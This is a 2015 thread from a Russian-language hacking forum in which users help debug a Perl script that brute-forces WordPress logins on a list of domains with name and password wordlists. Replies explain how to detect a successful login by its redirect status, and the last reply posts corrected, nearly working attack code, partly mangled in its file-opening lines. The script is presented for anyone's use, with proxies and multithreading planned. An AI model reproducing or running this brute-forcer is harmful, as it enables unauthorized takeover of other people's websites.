ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.07.2015, 09:19
|
|
Познающий
Регистрация: 18.05.2015
Сообщений: 37
Провел на форуме:
13262
Репутация:
0
|
|
Накидал на коленке сегодня за ночь код, но он не работает. Возможно для знающих эта проблема очевидна. В целом вот: https://gist.github.com/anonymous/4692681932d816355e73
Затык идет на чтении кода ответа - он всегда приходит 200.
Теперь немного объясню по параметрам:
-d - файл со списком доменов
-p - тут будет прокси(пока не сделал, сделаю когда разберусь с остальным)
-w - список паролей
-n - список имен для перебора
В планах добавить еще мультипоточность и развивать. Выбрал перл именно для обучения, и проект создается только в ознакомительных целях
P.S. просьба подсказать только по данной проблеме. Остальное хочется решить самому. Ну и ждите обновлений в этой ветке. Код будет открытый и пользоваться сможет каждый |
|
|
10.07.2015, 13:22
|
|
Познающий
Регистрация: 14.05.2015
Сообщений: 63
Провел на форуме:
20946
Репутация:
3
|
|
Сообщение от jslby
↑
Накидал на коленке сегодня за ночь код, но он не работает. Возможно для знающих эта проблема очевидна. В целом вот:
https://gist.github.com/anonymous/4692681932d816355e73
Затык идет на чтении кода ответа - он всегда приходит 200.
Теперь немного объясню по параметрам:
-d - файл со списком доменов
-p - тут будет прокси(пока не сделал, сделаю когда разберусь с остальным)
-w - список паролей
-n - список имен для перебора
В планах добавить еще мультипоточность и развивать. Выбрал перл именно для обучения, и проект создается только в ознакомительных целях
P.S. просьба подсказать только по данной проблеме. Остальное хочется решить самому. Ну и ждите обновлений в этой ветке. Код будет открытый и пользоваться сможет каждый
А шо не питон ? Пион по-мойму кошернее
|
|
|
|
10.07.2015, 14:40
|
|
Новичок
Регистрация: 12.09.2007
Сообщений: 14
Провел на форуме:
136460
Репутация:
2
|
|
jslby скрипт рабочий, правда недопиленный, только учти тебе не нужно проверять на 200 код ошибки (он будет всегда при неверном логине\пароле). При успешном логине wp-login.php вернет 301 а не 200.
|
|
|
|
10.07.2015, 15:51
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902
Репутация:
0
|
|
В перле не особо силен, но почему бы так не проверять
Код:
if($resp->is_success){
print "Found: $thisName:$thisPass\n";
}else{
print "Not Found: $thisName:$thisPass $resp->status_line\n";
}
|
|
|
|
10.07.2015, 16:43
|
|
Новичок
Регистрация: 12.09.2007
Сообщений: 14
Провел на форуме:
136460
Репутация:
2
|
|
И с учетом моего комментария
Код:
if($resp->is_redirect){
print "Found: $thisName:$thisPass\n";
}else{
print "Not Found: $thisName:$thisPass $resp->status_line\n";
}
|
|
|
|
10.07.2015, 18:28
|
|
Познающий
Регистрация: 18.05.2015
Сообщений: 37
Провел на форуме:
13262
Репутация:
0
|
|
Сообщение от Swat2k
↑
И с учетом моего комментария
Код:
if($resp->is_redirect){
print "Found: $thisName:$thisPass\n";
}else{
print "Not Found: $thisName:$thisPass $resp->status_line\n";
}
Да, спасибо. Логику с редиректом понял. Но код запускается и при первом запросе в любом случае всегда отдает след: 301 Moved Permanently. В следующих возвращает страницу логина с кодом 200, даже когда я точно уверен что логин и пароль верны
|
|
|
|
10.07.2015, 22:40
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
А где многопоточность?)
|
|
|
|
10.07.2015, 22:46
|
|
Познающий
Регистрация: 18.05.2015
Сообщений: 37
Провел на форуме:
13262
Репутация:
0
|
|
Сообщение от b3
↑
А где многопоточность?)
Сегодня выделю время, если кто подскажет по текущей проблеме. Планирую делать через очередь и обработчик. Как считаете?
|
|
|
|
10.07.2015, 22:49
|
|
Познающий
Регистрация: 18.05.2015
Сообщений: 37
Провел на форуме:
13262
Репутация:
0
|
|
Сообщение от Шниперсон
↑
А шо не питон ? Пион по-мойму кошернее
Только хардкор))
Перл тру язык с очень гибкими возможностями. И еще он мне нравится
|
|
|
|
11.07.2015, 02:46
|
|
Новичок
Регистрация: 12.09.2007
Сообщений: 14
Провел на форуме:
136460
Репутация:
2
|
|
Сообщение от jslby
↑
Сегодня выделю время, если кто подскажет по текущей проблеме. Планирую делать через очередь и обработчик. Как считаете?
Ты передаешь не все параметры скрипту, смотри в лисе что уходит в скрипт. Исправил.
Код:
use strict;
use warnings;
use Getopt::Std;
use HTTP::Cookies;
use LWP;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
my $cookie_jar = HTTP::Cookies->new(
file => "cookies.dat",
autosave => 1,
);
getopt('d:p:n:w:');
our($opt_d, $opt_p, $opt_n, $opt_w, $dfh, $nfh, $wfh);
open($dfh, '){
chomp $thisDomain;
open($nfh, '){
chomp $thisName;
open($wfh, '){
chomp $thisPass;
my $ua = LWP::UserAgent->new;
$ua->cookie_jar($cookie_jar);
my $resp = $ua->post("http://$thisDomain/wp-login.php", { 'log' => $thisName ,
'pwd' => $thisPass,
'wp-sumbit' => 'Log In',
'redirect_to' => "http://$thisDomain/wp-login.php",
'rememberme' => 'forever',
'testcookie' => 1});
if($resp->is_redirect){
print "Found: $thisName:$thisPass\n";
}else{
print "Not Found: $thisName:$thisPass $resp->status_line\n";
}
undef $resp;
}
}
}
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
